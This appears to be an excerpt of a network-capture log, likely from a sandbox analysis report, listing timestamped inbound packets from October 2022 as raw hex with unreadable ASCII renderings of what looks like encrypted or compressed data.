                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC903INData Raw: 77 3b 4a 85 55 87 bb 5b 07 e7 a1 64 cc 98 73 e6 86 00 d9 c7 f1 36 f6 0a bd ff d2 c2 d0 fe 7d dd 01 de 70 ef 6a cf ca 23 90 6e 98 e5 b2 7c db fc 48 97 06 42 98 6b a9 76 5b 35 f9 e0 48 e8 b9 2a 69 9b f6 47 af 16 c9 66 95 76 8a 44 ec ff 3c 66 5b f7 e7 d4 19 1b e4 ed 8e 9b b5 11 48 51 e0 f9 1d 58 79 47 94 ed 3c 6f 2b 08 68 b2 17 0b 2b 74 0f c6 15 a2 23 99 ae aa 65 77 32 cd f0 85 71 a7 c7 95 f6 71 70 f2 e5 65 49 69 b8 db 30 48 94 bd 4d b9 1e e2 d3 2c 57 5f c4 26 bb d7 cf d7 eb fb 64 7e 55 af 12 6a 62 2d d3 f3 60 06 73 fd 0a 6c ee b8 6a 62 3d 14 09 21 b4 2f 0b 1b f8 d0 61 cd 13 45 56 ff 4a a4 b6 06 0e 51 31 33 fd 40 97 21 72 de 64 e8 19 40 31 74 6a f7 61 3a 9c 2e d3 bb df a9 bc 64 85 d9 76 c0 e5 31 c5 39 9b d1 7b be 6a 30 1f 42 d3 31 7e c4 e0 fc bc 67 94 18 31
                                                                                                                                                                                                                                    Data Ascii: w;JU[ds6}pj#n|HBkv[5H*iGfvD<f[HQXyG<o+h+t#ew2qqpeIi0HM,W_&d~Ujb-`sljb=!/aEVJQ13@!rd@1tja:.dv19{j0B1~g1
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC919INData Raw: f1 3d 45 13 a2 0e e0 1f 00 72 47 2c ef 09 8f f3 7b 80 b7 1a ed a3 28 d8 fe 4a 94 23 e1 c6 a0 71 5b 69 55 e1 bd a8 fe db 1d 64 0d 28 0f 40 49 31 d8 5e c9 18 10 ed 76 fa 8c 55 04 42 26 4a a9 d0 f0 92 30 95 6e 21 dc d1 0f 80 0b 8a dc c5 04 a3 5b bf d2 a0 df f7 6c 81 3c cf 5e 33 3d 29 a6 59 12 92 f3 26 3c 3a 81 0a 3a 7a 36 d2 dd c3 87 81 b8 be 7e 3a 80 1d d5 1b 01 da 07 90 73 32 8b 63 46 ef 03 7e ea 32 27 49 c9 eb 70 cb f0 fc 89 b7 ff 1f f4 fb ce 1e d5 5c 41 8c 12 08 a5 1a 48 34 c7 45 55 34 46 50 1f 9a 2d 31 fd b6 e1 c9 67 c6 ea 84 88 8a 74 9e b5 b1 9c 46 c8 2a 68 64 4a 05 0c d4 9a 71 3c 7d b9 b2 34 e9 d4 27 44 4c 01 62 b4 41 b2 f5 5e 98 85 12 20 a8 2f a3 f1 06 a2 dc cb 47 e4 29 80 c7 81 a9 fd d4 cb f4 60 60 bb 48 ea 5a 01 55 69 14 38 dc 9e 8e 27 e8 b5 cd 6a
                                                                                                                                                                                                                                    Data Ascii: =ErG,{(J#q[iUd(@I1^vUB&J0n![l<^3=)Y&<::z6~:s2cF~2'Ip\AH4EU4FP-1gtF*hdJq<}4'DLbA^ /G)``HZUi8'j
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC935INData Raw: 5b 8d 85 a4 41 7f f6 40 03 3f b6 de 77 d4 1d 10 b0 50 c7 0b 64 a8 83 88 92 81 55 0b b0 78 a7 82 7e 2f 7f 38 fd 1a 4e 6b 8f c9 8e f1 76 bc 2c b2 fe 26 5c e8 04 65 7d f7 41 ad 26 c3 1f d8 40 0d 29 ca 75 bc f0 62 8a ef 1e 43 e0 a9 b8 37 16 0b a6 8c f9 bc 48 2d 37 72 eb 28 53 09 c8 36 01 70 0d d3 f9 5d 8d 83 f9 b0 9f 67 2c 92 71 fa e3 77 a2 87 0a 04 99 24 d1 37 49 40 4e 29 9d 88 93 c1 35 a5 f2 a6 ae 7f 42 ac c4 18 a2 43 04 17 6e 99 31 d1 58 10 0d a7 fb aa fc 75 f4 fe 63 af 3f 46 11 08 8b 72 ac 72 6b 22 79 5f 1f 9c 5a d8 c8 b7 12 51 c7 a3 74 fb 90 b9 6c 88 1e 09 3f 13 01 fb ca 51 38 55 f6 0d 57 72 15 ee 12 a7 8c b1 fa 3a a4 fb ff ee 64 9b 92 e2 0e 83 16 ec bc 98 05 17 0f 35 52 48 d3 70 7c 5f 12 38 0b 7d 06 cf aa 6e 08 0f e4 ab 31 64 06 e7 5b 9d aa 82 e6 31 47
                                                                                                                                                                                                                                    Data Ascii: [A@?wPdUx~/8Nkv,&\e}A&@)ubC7H-7r(S6p]g,qw$7I@N)5BCn1Xuc?Frrk"y_ZQtl?Q8UWr:d5RHp|_8}n1d[1G
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC951INData Raw: fb e8 7b 01 68 6e 93 26 bd 69 6f 64 41 85 d2 d6 82 7f a3 01 13 91 7a 78 c3 b4 0a 5a 60 56 dc 29 72 e7 de 7f f8 cf 02 f6 e2 db b4 1f 7c 95 aa dd ad f2 3e 35 c8 d1 13 48 89 7b 92 0c 00 99 e0 e4 f6 9f a8 0f e1 64 b6 13 fe 36 69 b5 03 b3 f2 b0 92 d1 ca 1e 97 69 6f 07 f5 e6 06 48 c7 68 16 13 99 9c 19 35 ed 94 08 a7 b7 e3 e9 3f 03 6f 91 94 c4 a2 01 ea 5e 92 04 8e 72 46 9d 18 2f d4 d1 74 82 88 83 0d 4a a2 95 73 09 2d 6e ab 83 59 6a 1e 9b 28 ce 39 a4 c5 14 44 d8 96 c2 ec 0f 77 4d 03 25 df f5 18 3f 9a 56 bf ec 5a 04 87 ef 48 11 01 9b 96 88 3c d1 a6 c6 2e a7 58 bd 25 3b c6 2c 91 80 f1 0a 9a 27 9b 1b 69 90 a8 d3 9c 84 53 b0 7f 6f 05 c3 44 9a c1 3f 59 9d 1c e3 ff 8e da 33 7a da 0d 28 49 90 da 6c 4d 1f a1 be 81 54 3e 0f af d8 f0 7f 8e 27 2a 3a 96 25 88 80 b1 a5 65 88
                                                                                                                                                                                                                                    Data Ascii: {hn&iodAzxZ`V)r|>5H{d6iioHh5?o^rF/tJs-nYj(9DwM%?VZH<.X%;,'iSoD?Y3z(IlMT>'*:%e
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC967INData Raw: 40 95 0b 10 04 23 bd cd f6 2d 86 81 4b 89 82 82 00 c9 fe 9c 3f 13 be be e4 29 81 66 30 2b 78 a8 56 52 f1 0e 78 8b dd 7c 55 11 5d de ec 3d a2 42 36 c8 17 7a ad 11 ae 40 f4 a4 97 e7 b3 32 f9 e7 a0 1d 70 43 7c 3f d8 2b da 8f b8 b1 f7 1b a9 33 5b ea 14 29 fa a8 ca 41 6c e0 0a 83 bf d7 f3 63 a3 6f 5a 67 6b f7 17 0e de a0 32 c4 0d 20 c9 0c 6c d7 f7 2e 77 4c 41 27 7f d2 d1 d9 3f f6 ad ad 8b de a5 7e 72 e7 b2 95 71 47 e8 f1 f2 ea ee 8e 53 50 8c 17 66 d3 af 37 67 a3 f9 6b 32 cb 41 15 be ae ad 95 14 76 71 04 b4 a0 cc ed ad 80 ac 46 ae ce 7f 4e a1 44 52 67 76 e5 12 4e 90 ad dd 1a 02 31 9e 44 18 24 09 ef 9d cd b7 90 e1 f8 80 4f e4 b9 ff c1 71 94 8d b6 2f 9b ec 80 5a 23 ed 7e 7a 83 c1 c0 e2 d3 5e de 2f 66 a3 44 76 72 3c 6a e7 18 6a 22 07 af 49 26 ce f5 aa 05 19 52 9e
                                                                                                                                                                                                                                    Data Ascii: @#-K?)f0+xVRx|U]=B6z@2pC|?+3[)AlcoZgk2 l.wLA'?~rqGSPf7gk2AvqFNDRgvN1D$Oq/Z#~z^/fDvr<jj"I&R
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC983INData Raw: 71 09 7f 77 aa 4f c7 47 0e 92 a1 04 49 ea cf 47 8a ba 48 1a 40 93 ad 29 d4 9b 15 d6 3d 58 45 c4 1f ac aa cd b7 5f f3 df de 06 8c a4 f1 3f 7e d2 2c 35 a9 7b 88 bd cd 5b 0d 41 5f 8d 90 10 50 8a f7 c3 c5 e7 37 19 4a 22 43 83 52 db 21 dd 48 65 72 b8 7d ee bc 9b 08 dd 45 23 c6 51 6e 46 6a 36 02 58 a5 3a 64 ee 7e 2c f6 54 ef a0 22 42 be 47 71 ef e3 a7 16 73 34 c7 80 bf a8 9e c9 f3 d8 60 e8 93 d7 50 79 e7 eb 23 c0 57 c9 14 e5 12 96 cd f8 89 c7 26 e1 ad 9b 9a 0f f2 a2 d7 a2 41 7d 91 3b 1f d3 10 52 98 e4 4b 04 86 3f 1c 3d 8b 07 3f fb 79 e9 ff e3 35 2d 22 fc 7d 55 58 85 d1 c1 e0 30 69 99 ba fc 9d af 22 a4 a5 1b b6 8a 5d 4c 6c 3b df a3 7d 82 0f c5 b1 c5 0d aa ef 6e ce d7 62 41 fa 87 48 a5 c8 8c db ae dd 0d 4d 05 94 3e 72 6a bf 74 5d 45 e4 44 00 96 ca b1 a0 dc cd b6
                                                                                                                                                                                                                                    Data Ascii: qwOGIGH@)=XE_?~,5{[A_P7J"CR!Her}E#QnFj6X:d~,T"BGqs4`Py#W&A};RK?=?y5-"}UX0i"]Ll;}nbAHM>rjt]ED
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC999INData Raw: de b9 db ae b6 8d 07 5d 3d f7 2d 9c 12 67 07 2b 93 1f 0e 21 15 11 bf 08 07 e8 a7 f4 b4 e2 2f 9c 6a 90 d4 5b f2 73 7d c0 22 54 d0 e9 dc 8c 15 7d 40 ae d7 c8 b2 d5 68 75 8b 7c 33 df 34 f0 78 cd 96 2d 61 af 68 55 89 97 66 d0 46 25 f9 01 36 64 bb 61 0b 2e ac c5 d8 ba 0c 6f 1f 9c 06 20 0f af e1 67 13 6b 50 ed 19 53 eb c0 b1 9d 65 fb 0a 0f 32 48 99 00 1f 75 9c 39 d7 fe 37 cb 77 3c 97 6e 6d 8e 4d 63 a1 2f bb da ea 5d af 28 f2 56 0e 33 16 3f 85 92 8f f2 19 c4 6f 6b ef 7a a8 17 dc 44 8e 05 ca 83 75 2d 8b 27 22 9d 4e 5c c1 2e 5d 68 ce 5e c2 e0 b5 3c 0a aa 3c 25 a7 c1 0d 90 a4 0d 64 69 08 f1 38 23 66 b8 57 e9 29 64 37 2a 0b d7 68 54 64 fa 76 08 94 3b 25 ac ad ff 30 08 3d c3 ce 58 24 c7 37 08 83 eb 29 a1 85 2f 54 68 46 cb 8e 1f 56 11 c8 a3 9b b3 b1 62 a5 e9 52 35 c9
                                                                                                                                                                                                                                    Data Ascii: ]=-g+!/j[s}"T}@hu|34x-ahUfF%6da.o gkPSe2Hu97w<nmMc/](V3?okzDu-'"N\.]h^<<%di8#fW)d7*hTdv;%0=X$7)/ThFVbR5
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1015INData Raw: 06 5e 16 27 fe 77 0a 6d b4 5c a8 b8 41 f7 48 1b 11 21 89 7b 11 57 0d 94 05 20 d1 54 22 cc 93 bf 9f aa b5 02 c6 5d 52 ba 80 9d cb b0 6b cb 30 31 03 a4 2b f5 f4 a8 e9 22 ed 80 4d ca 4b 0d 74 60 8a 4d cf 09 80 da 39 b9 23 08 cf 0f af cc 94 aa 7b 99 df fc fe 2e 0a f9 04 43 fb 42 15 1e 27 23 43 3c 80 46 25 69 94 43 8b 66 e3 a9 63 ca f4 12 1d 9b 75 59 cf 1b 9d 30 cf cd 67 4c 0a 47 4a a2 dc 6f bc 30 ec 42 8d 40 3d 8a e2 bf 23 27 c0 8e e6 b8 dc 2a 88 87 8a 69 d9 e5 f3 2c 9a 80 a5 f8 f6 83 39 ce 21 5c d4 9e 69 ca d6 ff 07 8f ff e6 b8 53 e3 ba 5e 3c b1 d4 4a 44 c6 58 08 02 cc 7c 26 9e 74 67 7e 67 07 e9 a5 c8 d8 0a 52 5a da df 75 94 c8 cf 5b e1 d3 ba 82 4e b1 b4 99 41 a7 94 ba 69 82 dd 65 80 b9 2a 6c 1d 07 89 65 2a 2e f9 1c 20 fd b7 58 b8 6c 5c bc cc 94 47 5c ad ae
                                                                                                                                                                                                                                    Data Ascii: ^'wm\AH!{W T"]Rk01+"MKt`M9#{.CB'#C<F%iCfcuY0gLGJo0B@=#'*i,9!\iS^<JDX|&tg~gRZu[NAie*le*. Xl\G\
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1031INData Raw: e6 c4 3c b0 82 7f a0 f4 e3 75 1a b4 1b 41 2a de c4 f1 72 b2 ff 66 aa 69 c6 48 3c de 32 32 25 d5 54 3a 49 79 39 70 68 f2 25 2f 63 24 4b a6 c6 59 ac 59 e2 c1 61 49 59 05 eb bf 76 86 1e 1d e6 f1 b2 67 2b 10 1e 17 89 15 92 0f a5 45 6c 82 29 cf 2e de dc c8 44 32 b7 b5 e2 fb ee 04 ce 91 b5 2c b6 6b 38 c4 01 fa 7a 65 88 37 1b b7 01 bc b0 a5 f5 aa f9 a6 49 c2 e3 cd 2f ba 4c ac 9d 64 f6 6b 06 8a 97 96 67 6c 4d ee 0a f9 2e 90 0d 99 7e c8 34 54 ad ce bf 05 8f 1b 62 5c a7 c8 2f 43 f4 21 62 e3 41 94 b1 d8 e0 2e 98 64 64 b4 28 b0 d6 ce 4a 65 21 ff 64 c0 b7 8e 35 25 fc 11 5f 57 87 59 88 d5 1b 0d 3c 6a b0 3f 62 09 ba 75 31 e2 2a 51 02 01 e3 a1 0b b3 d4 df 3a c6 3d 3d f3 cd 38 45 49 d4 29 8f d6 3c 3c fe e6 70 ea 70 a1 ca 99 e8 7a bf 51 35 9a 15 1f ba 94 d3 10 13 00 45 fb
                                                                                                                                                                                                                                    Data Ascii: <uA*rfiH<22%T:Iy9ph%/c$KYYaIYvg+El).D2,k8ze7I/LdkglM.~4Tb\/C!bA.dd(Je!d5%_WY<j?bu1*Q:==8EI)<<ppzQ5E
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1047INData Raw: 45 5f ec 6e 31 0b 25 4e d0 c4 af c7 5e db 95 54 46 5a 21 09 69 10 88 9e 75 24 3c 1e e0 4c 4e b4 c1 c9 88 ed 02 87 3c 38 51 41 58 f4 a2 b0 3b 6c c5 79 7b 05 33 53 e2 ae 13 89 54 ee 36 0b 5c 9e e3 27 18 a5 3d fc ae 4a f7 8a 0e c7 d3 a2 41 a8 06 1a 59 92 cc 81 10 b6 83 f9 4d c6 1b b6 df 15 c4 66 83 24 eb a4 98 a6 ae 0f ca f5 ac 4f 7a fd 40 8a 5d 56 c7 fe 5d 40 0d 30 44 42 91 43 a2 4c 0d 18 75 72 d8 4b 80 90 49 4b 6e 3c 38 2d d4 e0 7b 15 ee 36 79 68 38 ce ac c3 4e fc 7f e3 a3 9e 14 1f d9 1e 85 88 c3 1c 3f fb 17 84 97 0a 45 0c 12 ed 68 0f b1 50 cc da cc 88 55 1a 8b 07 4a 71 76 86 f7 df 64 63 49 a7 e1 f4 d2 aa 48 ba 1c 1f 0b 48 59 1f a1 3e de 70 00 49 2a 23 84 aa 96 0a ac 93 c6 0b 59 01 0a 08 5c 22 06 1f 18 e2 94 66 f5 91 bf d2 e2 15 1a e9 70 63 24 a9 01 6f c0
                                                                                                                                                                                                                                    Data Ascii: E_n1%N^TFZ!iu$<LN<8QAX;ly{3ST6\'=JAYMf$Oz@]V]@0DBCLurKIKn<8-{6yh8N?EhPUJqvdcIHHY>pI*#Y\"fpc$o
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1063INData Raw: ad ec 05 0c 50 3e 5c 6e 4d ed c1 1c 87 2e 7c 1c cb f8 8b 05 3b 8a 0e f1 5a 39 dd 1e 3a 02 17 52 a9 e8 ee 89 c2 7e d0 ff 88 33 65 82 b3 a7 e6 b8 4e 18 98 57 2e 34 f7 5b 1e 80 0a 2c ea 4d b1 89 5d 7a ce 03 0a df 10 2a 42 77 bb 0f 7c a2 73 00 3c 5d 08 5e 0f b9 2b d6 5b ec 17 06 8e 3c 16 04 df 2c 2d 15 29 38 4a a1 0b 19 76 da 5e 12 52 84 01 f4 79 6e f4 71 d2 3f 60 81 3c 9b b5 a4 02 78 84 67 d8 67 f1 ef c0 8a 0c cc 19 aa 99 6d e5 be 0f a5 0e 59 32 7d 22 db 46 bb 1e b2 a6 12 c5 91 ac 7d 8e 92 f9 0d 3a 9f 13 3b 6b 15 c7 2c f2 7a 90 2a 29 74 3b c3 65 ae be c1 e6 da f1 92 59 ae d3 e0 38 5f 3b 3b d4 24 07 45 fe 3c a5 8d 65 65 53 9f af cb 58 c5 d8 c7 18 7c 24 a5 eb b6 b0 3f 1e 14 e0 9e 65 c4 68 8e ee 3d b9 2c e9 b4 bc d4 f3 8f b8 bf 48 d8 50 34 f6 71 ff 1c df 54 78
                                                                                                                                                                                                                                    Data Ascii: P>\nM.|;Z9:R~3eNW.4[,M]z*Bw|s<]^+[<,-)8Jv^Rynq?`<xggmY2}"F}:;k,z*)t;eY8_;;$E<eeSX|$?eh=,HP4qTx
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1079INData Raw: 72 ec f6 be 7e 4a 39 ab 43 dd 35 b4 c9 f2 73 9c fa 50 44 ba b8 93 7a 13 d7 38 35 2b a4 39 e9 92 0c 4b 70 a0 ee 15 e3 1b e8 1d 55 9d 15 70 7a 7a 44 99 b1 19 5e 75 d2 9a ab e7 77 cf 7b c4 88 94 9a fe bc 82 ec 96 86 72 9f 71 a4 4b 66 7b 29 35 4f 55 7b 7f da 50 ed 92 ab 55 7a 17 39 d2 cf fa ac 02 15 8a 11 52 14 88 27 9f 06 4e ab 5a e8 85 cb 34 05 10 cf d1 6b 26 00 97 74 30 2e fc 68 43 6c d0 21 5e 4d 41 f6 7a f4 f6 df 84 75 3a e1 a9 82 61 30 2b 49 61 72 cd cb 39 b8 88 96 9e dd e8 7f ae e6 8d 15 dd 28 3a 75 4b 6e e6 f6 0c f7 5c 0d 0a b3 3e 24 1c 70 31 d8 e0 ff e5 c2 5d 5f 18 66 e5 19 82 c5 87 0c 4e 4b b9 92 88 46 71 e6 6a 36 e9 45 e3 f8 2d 0e 22 40 cf be b4 a9 03 f3 62 e5 29 ef 08 83 df ad 51 e2 4c 7a 9b 81 79 0c 53 b9 6e aa 92 68 fe ee c8 3b 2e 68 8e aa 0b 6c
                                                                                                                                                                                                                                    Data Ascii: r~J9C5sPDz85+9KpUpzzD^uw{rqKf{)5OU{PUz9R'NZ4k&t0.hCl!^MAzu:a0+Iar9(:uKn\>$p1]_fNKFqj6E-"@b)QLzySnh;.hl
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1095INData Raw: 86 5e 95 6b 94 12 ed f2 a7 7a f5 60 50 ff 43 da 07 4d 5c be 95 d2 2d cd 91 2a a9 4d fe ef e4 05 08 0a ba ee a2 84 9f 33 e4 9c ef e7 f5 33 06 68 69 9c 9e b4 fc 0e 9a 1a 52 5e 72 69 5c bb 46 0a 37 e4 47 b3 1d 49 23 1a 1d 2c 8b b3 4f 60 9f ff 64 05 4a 62 0e 1d 8a 42 6b 6d 6c 73 6b 13 6b a2 32 0c 69 5b 15 bd 4f dd 67 7b b9 8c 1e a0 7c cd e5 38 3c fa a5 11 b7 ea 3b 16 93 f6 f5 20 2a 12 db ef 5f 07 9e ea 48 df b7 04 65 8a bf 53 45 bd 0c 88 cf 26 51 1c d4 6b 7b bc 6e f0 e6 5c 86 9f 14 3d bf 82 b8 e2 74 c3 c0 84 9e ab 35 d7 da e1 0e fd 59 43 0f 3c 51 ed 25 04 d7 76 4c 0c 5b 5b 98 d9 85 26 b3 fd 9f 9a 75 4b 01 b6 0e d3 24 1c c4 88 c0 23 8e 8d f5 2b 99 6d 2f a5 83 85 d9 6f df b2 f1 d3 ee 1c f9 41 0e 04 99 3a 6c c8 cf 5b 5a b4 82 85 c5 86 7d d2 bd 48 9a 20 cf 9c 7b
                                                                                                                                                                                                                                    Data Ascii: ^kz`PCM\-*M33hiR^ri\F7GI#,O`dJbBkmlskk2i[Og{|8<; *_HeSE&Qk{n\=t5YC<Q%vL[[&uK$#+m/oA:l[Z}H {
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1111INData Raw: 8d ba 0e 94 f8 a7 2a b8 47 5b ba 13 8a 99 a3 b2 b2 40 11 33 fd b4 8d 9d f3 00 3a 14 51 20 11 11 09 62 ce 7f a3 8c 66 89 e6 3e 30 91 09 3c 3c 0c 80 ea f6 65 e2 1b e8 4e 61 ca da d7 06 e9 c8 61 5f 9b 59 65 6b 07 24 af 11 98 1c 06 c6 cb a4 81 72 68 b8 ab b6 f2 08 b8 3d 1d 1d b6 64 9e 1f e6 47 55 69 38 c5 b4 f9 5a 7c 5c c0 15 f6 0e f2 1f 1d 0f 8a 63 b9 7f 2b c3 5b 37 8a 7b 22 bf 57 4e 48 09 d1 8a 9c 7d 9c 47 73 d6 f0 7d 44 ad 6a b3 e9 14 a3 c8 2e e6 70 dc 63 c4 6b 5f ed 84 b8 d5 02 bf d2 59 a4 9d 31 78 fb 47 74 d8 fd f2 f8 c9 94 7c 2f a1 39 35 a9 bf da 96 77 df d5 0c 7c 01 7a e9 bf c1 28 b1 03 74 61 df fc 05 e7 73 20 e0 99 96 1e 95 18 7a ca d1 bc 5c 58 1c b5 18 3f 2f d4 ea 33 15 8b d9 b6 5a 8f 7b 06 a2 cb eb 88 1c 61 b0 47 d7 e1 7d 46 2d bd 1a a0 24 96 95 9b
                                                                                                                                                                                                                                    Data Ascii: *G[@3:Q bf>0<<eNaa_Yek$rh=dGUi8Z|\c+[7{"WNH}Gs}Dj.pck_Y1xGt|/95w|z(tas z\X?/3Z{aG}F-$
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1127INData Raw: 65 65 b5 19 54 7b 76 30 7d c1 cb 80 5b b8 62 07 9c f0 66 a0 f4 32 d9 fe 8d 8e 96 11 6b 84 40 51 74 03 a2 c8 91 22 4a 86 51 90 15 3c ca 99 46 ac b8 1d a8 ad 70 b2 56 52 47 e9 75 9e 8c fe 0e 7a 6d db 46 f7 6a a5 ed 4e bf 04 3a ec 0c 88 9c 85 15 38 78 fe 9f 71 28 b0 b2 e9 60 13 48 98 1d 71 8f 90 53 49 cc 34 cf 87 6a 7e 5f 86 ae b8 a7 02 7f 98 29 18 d8 aa c7 53 e9 50 b4 af 21 df 7b bf c5 91 9e 7f 8e f1 9f 66 b3 17 74 05 d5 7e c8 92 d5 75 e8 15 1b 94 7a 45 c8 94 2b ee 6e a7 19 e9 b7 43 d5 e2 3c 5c c3 b5 2d 11 22 a7 a3 3f ca 13 ba 95 e4 36 b9 e1 58 d2 73 b8 d0 ea 52 14 6b c8 56 40 53 2e 76 bb af 3b a1 07 fe dc d3 2c ae b2 00 81 5a 44 8a 74 fc 62 35 6a 05 44 74 da 94 30 fc 8f bb 46 99 4a ec 02 87 bc ab 38 8a e7 46 bb 5a e0 63 38 dc 88 2f db 44 d5 ec 88 53 9b 61
                                                                                                                                                                                                                                    Data Ascii: eeT{v0}[bf2k@Qt"JQ<FpVRGuzmFjN:8xq(`HqSI4j~_)SP!{ft~uzE+nC<\-"?6XsRkV@S.v;,ZDtb5jDt0FJ8FZc8/DSa
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1143INData Raw: bd b7 39 7b fc 81 24 39 c1 e2 60 80 b7 e2 ef b1 17 0d 75 3f 33 b1 1d d8 cb 17 dd 1d 1b f7 f9 97 87 f7 3c 0f 0b ac 41 88 2c b8 0f c8 2a 6f 3a 16 fa d3 d5 1e 52 36 d7 70 69 65 0a d9 7d 82 51 f2 22 2d 0a 12 8c 5b ef fe e6 11 ed 99 67 8a b4 0b dc 7e 53 dd d6 f8 5c c5 3b 32 e9 0b d1 07 95 26 e2 85 60 93 40 79 11 23 8a 17 7e 17 b4 c6 29 ed 5c a1 a9 91 fc 6b 3b f7 f0 0a aa e0 71 2c 8c 91 be 2e 3e 56 6b 29 b7 8b 4d b1 cc 6e 37 11 1d cf 51 43 7d c8 29 ad 53 14 ea 3e 80 e0 7b 3e 42 65 e4 9b db 6f a4 3b a2 29 ec fa 09 5f 39 13 8d ad f2 94 39 cf 39 ee 35 5f 45 47 f5 fc e9 cc 4a 6b 37 f0 93 53 37 1f a8 07 89 fb cb a4 47 3f ee 78 52 e1 32 54 c3 f6 c4 9e 14 f0 82 e9 98 bc 9d fd c0 25 16 e3 35 a4 81 41 a6 56 e7 7e 3c e3 a4 a0 ac 67 dd 98 52 bc 82 10 91 e9 63 8e b0 3a c2
                                                                                                                                                                                                                                    Data Ascii: 9{$9`u?3<A,*o:R6pie}Q"-[g~S\;2&`@y#~)\k;q,.>Vk)Mn7QC})S>{>Beo;)_9995_EGJk7S7G?xR2T%5AV~<gRc:
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1159INData Raw: c5 c7 4c 08 ff 09 45 7d ab 6f 9e 00 b3 fd c6 cb f9 92 29 09 7d 32 97 7f 15 97 ac 2e fe 1c b1 41 93 b4 6e a0 89 37 65 45 fc 76 20 94 9c 1d b1 d3 db 31 ff 00 d8 e9 78 1b b7 75 63 e8 a3 98 cf 63 1a ae e0 3b 05 11 96 55 bc 95 b9 b4 0f dd 20 c8 6e 0b 95 65 9c 8d 73 be ba 22 19 31 62 7b bf d3 85 a9 05 84 4d a3 f5 06 2e 7d f3 63 64 ff 2c f5 cd 62 1e 22 e0 cc 49 66 62 43 59 18 bb df b1 d1 c1 61 2c 59 2a ee d2 46 e6 a7 c7 7e 23 3e 96 91 eb 7f f5 7a d6 10 ff ae 25 8a c8 db 78 18 a2 d6 3a 40 75 59 f2 89 ce 67 ee 99 6c 8c 19 3e 57 6e 9a 8e a5 dd a3 5d ac 98 fc 8e 50 cd 3c 7a fe ef 6d 02 92 9e aa 6d d3 5a 1b 3d 7e 78 b9 a6 d9 89 c2 96 de 7e bb aa 8a fc 2c c5 45 f0 d3 d3 66 cb a5 1c 53 d2 22 0a c8 5a 53 39 30 78 ee 93 64 b4 e8 51 af 3a fb 60 17 7e cc 09 0b 64 a7 90 ca
                                                                                                                                                                                                                                    Data Ascii: LE}o)}2.An7eEv 1xucc;U nes"1b{M.}cd,b"IfbCYa,Y*F~#>z%x:@uYgl>Wn]P<zmmZ=~x~,EfS"ZS90xdQ:`~d
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1175INData Raw: 28 7f 4d 3f e4 77 05 8e 20 35 74 c3 24 1b 82 37 9c 34 d3 5a 08 e5 c7 ab 74 4a e6 d7 e8 23 13 98 21 6a bc c7 3e 91 17 b3 ac 59 b1 10 62 35 e1 c7 84 dd 96 47 d3 58 fb 8a 5d cc 40 c6 b3 5a ba 58 bb 36 ef 2f c6 cc 6e 47 e0 4c eb d8 58 90 e2 1e b7 ce b5 2e 3d d4 94 e6 5d cf 0a 30 6b 11 12 9d ca e1 17 e0 c7 26 75 af c6 91 0f 24 40 38 4e c5 76 24 e4 91 aa d7 a5 83 2d 01 2a 36 80 c4 d1 5c b3 54 94 20 62 8b 72 b0 61 1b 2c 30 59 1c a3 b7 e0 d4 a1 12 e5 a6 ce df 30 56 6c 85 55 9a f2 42 b3 99 e2 f7 37 da 83 c3 cd 06 92 5f c0 76 c1 54 01 76 9c 3a 1b c7 b9 25 43 3b de 6a 40 34 81 a1 a6 a3 4c ac 7c 44 60 54 49 4c 3e 97 e1 2a ec 92 f1 28 77 ac 61 94 44 84 db 01 34 6f 54 0d 62 fc 33 30 ac d0 5b 41 db 76 f6 1e 9f c1 96 de 19 b3 f4 31 5e 18 82 e0 64 7c c5 a8 69 ce f8 8e 75
                                                                                                                                                                                                                                    Data Ascii: (M?w 5t$74ZtJ#!j>Yb5GX]@ZX6/nGLX.=]0k&u$@8Nv$-*6\T bra,0Y0VlUB7_vTv:%C;j@4L|D`TIL>*(waD4oTb30[Av1^d|iu
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1191INData Raw: 50 ad 25 a2 1b c3 2f 6e 2f 60 bc 46 89 49 e7 5b 93 68 a0 fc 84 fd b2 c1 97 1b 3f 62 50 3f 31 20 0f c1 43 f1 4b a4 e2 b5 f1 8b 38 fb 31 b8 e0 92 41 f6 9f 59 41 fe 6d c4 4c a0 01 64 07 c2 b8 08 62 44 d8 2b bf 4b 73 de 40 46 34 97 77 a5 86 af 25 60 60 ef a4 52 ec 5c d8 4c 72 68 50 a7 8b d8 cc 93 c2 7e 72 3d 2a 94 c4 b2 7e 30 bc 98 b9 4f 0f c9 70 23 48 bd 6f 96 02 cc 75 5c 43 6b ad 58 93 19 49 7d 72 d7 56 7c 89 44 f8 5f ff 82 85 7d f9 c6 4f 70 7e 3a 7c f4 f5 96 89 16 56 71 f7 a6 e2 b1 a9 5e 68 70 84 2b d6 30 f2 46 ca ae 6f e9 9d bb f3 f5 ea d4 aa 72 1d ee 34 55 1b 78 5d 8c df b8 91 44 04 b1 c5 c9 49 62 0c a8 64 3b 31 df dc 22 a7 97 3a 28 8b ca be f8 75 73 19 66 4b ce 4d 5c d5 a4 90 8e b3 26 e7 c3 1d 1b bb 22 cc 81 36 aa 8f 20 45 72 07 15 c9 7e 4d 72 58 7c 8a
                                                                                                                                                                                                                                    Data Ascii: P%/n/`FI[h?bP?1 CK81AYAmLdbD+Ks@F4w%``R\LrhP~r=*~0Op#Hou\CkXI}rV|D_}Op~:|Vq^hp+0For4Ux]DIbd;1":(usfKM\&"6 Er~MrX|
